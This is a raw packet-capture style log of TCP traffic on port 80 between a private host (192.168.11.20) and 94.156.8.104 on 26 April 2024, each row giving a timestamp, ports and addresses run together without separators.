                                                                                                                                                              Apr 26, 2024 09:41:54.173599958 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.173655033 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.173690081 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.173690081 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.173715115 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.173773050 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.173774958 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.173774958 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.173831940 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.173886061 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.173892021 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.174041033 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.174041033 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.174098015 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.174129963 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.174348116 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.382679939 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.382761955 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.382821083 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.382873058 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.382879019 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.382936001 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.382936954 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.382992029 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.383047104 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.383052111 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.383102894 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.383106947 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.383153915 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.383163929 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.383220911 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.383220911 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.383275986 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.383299112 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.383331060 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.383384943 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.383415937 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.383440018 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.383480072 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.383496046 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.383543968 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.383550882 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.383608103 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.383637905 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.383665085 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.383718967 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.383754969 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.383774996 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.383805990 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.383884907 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.383961916 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.593202114 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.593286037 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.593348980 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.593404055 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.593461037 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.593466043 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.593466997 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.593519926 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.593549013 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.593580008 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.593636036 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.593660116 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.593691111 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.593709946 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.593745947 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.593786955 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.593801975 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.593852043 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.593858004 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.593914032 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.593967915 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.593997002 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.594024897 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.594060898 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.594084024 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.594125986 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.594140053 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.594191074 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.594197035 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.594252110 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.594321012 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.594336033 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.594377041 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.594403028 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.594432116 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.594479084 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.594489098 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.594543934 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.594554901 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.594598055 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.594652891 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.594697952 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.594707012 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.594749928 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.594760895 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.594815969 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.594815016 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.594870090 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.594880104 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.594924927 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.594980001 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.595021963 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.595035076 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.595088959 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.595088959 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.595143080 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.595150948 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.595200062 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.595242023 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.595253944 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.595309019 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.595359087 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.595362902 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.595417976 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.595423937 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.595479012 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.595581055 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.804229975 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.804331064 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.804388046 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.804442883 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.804505110 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.804502010 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.804559946 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.804574013 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.804625988 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.804636002 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.804692984 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.804733038 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.804749966 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.804811001 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.804868937 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.804924965 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.804922104 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.804985046 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.804989100 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.805032969 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.805042028 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.805094004 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.805097103 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.805152893 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.805207014 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.805260897 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.805289030 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.805315971 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.805367947 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.805372000 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.805427074 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.805433035 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.805480957 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.805495977 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.805536032 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.805591106 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.805644989 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.805677891 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.805701017 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.805742025 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.805757046 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.805794001 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.805811882 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.805866003 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.805874109 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.805919886 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.805974007 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.806029081 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.806027889 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.806077957 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.806086063 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.806140900 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.806147099 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.806195021 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.806236029 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.806250095 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.806304932 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.806359053 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.806365967 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.806415081 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.806417942 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.806468964 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.806483030 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.806524038 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.806576014 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.806579113 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.806633949 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.806688070 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.806718111 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.806718111 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.806741953 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.806796074 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.806847095 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.806850910 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.806905031 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.806911945 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.806958914 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.807013988 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.807054996 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.807068110 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.807107925 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.807121992 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.807172060 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.807177067 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.807231903 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.807262897 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.807286024 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.807341099 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.807394981 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.807394981 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.807446003 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.807447910 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.807502985 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.807511091 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.807557106 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.807600975 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.807611942 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.807667017 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.807722092 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.807730913 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.807777882 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.807782888 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.807832956 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.807876110 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.807887077 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.807939053 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.807941914 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.807996035 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.808049917 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.808084965 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.808104992 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.808144093 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.808161020 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.808223963 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.808234930 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.808290005 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.808290005 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.808342934 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.808398008 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.808406115 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.808450937 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.808458090 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.808505058 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.808548927 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.808561087 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.808614016 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.808617115 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.808671951 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:54.808764935 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.808814049 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:54.808895111 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:55.017721891 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:55.017800093 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:55.017862082 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:55.017918110 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:55.017972946 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:55.017978907 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:55.018029928 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:55.018033028 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:55.018089056 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:55.018143892 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:55.018186092 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:55.018198013 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:55.018254995 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:55.018269062 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:55.018320084 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:55.018321037 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:55.018378973 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:55.018405914 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:55.018434048 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:55.018490076 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:55.018531084 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:55.018544912 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:55.018600941 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:55.018610954 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:55.018656969 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:55.018665075 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:55.018712044 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:55.018767118 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:55.018783092 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:55.018821955 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:55.018835068 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:55.018878937 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:55.018934011 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:55.018935919 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:55.018989086 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:55.019043922 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:55.019046068 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:55.019093990 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:55.019098997 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:55.019155979 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:55.019253969 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:55.019310951 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:55.019325018 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:55.019366026 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:55.019402027 CEST5030080192.168.11.2094.156.8.104
                                                                                                                                                              Apr 26, 2024 09:41:55.019421101 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:55.019476891 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:41:55.019479990 CEST5030080192.168.11.2094.156.8.104
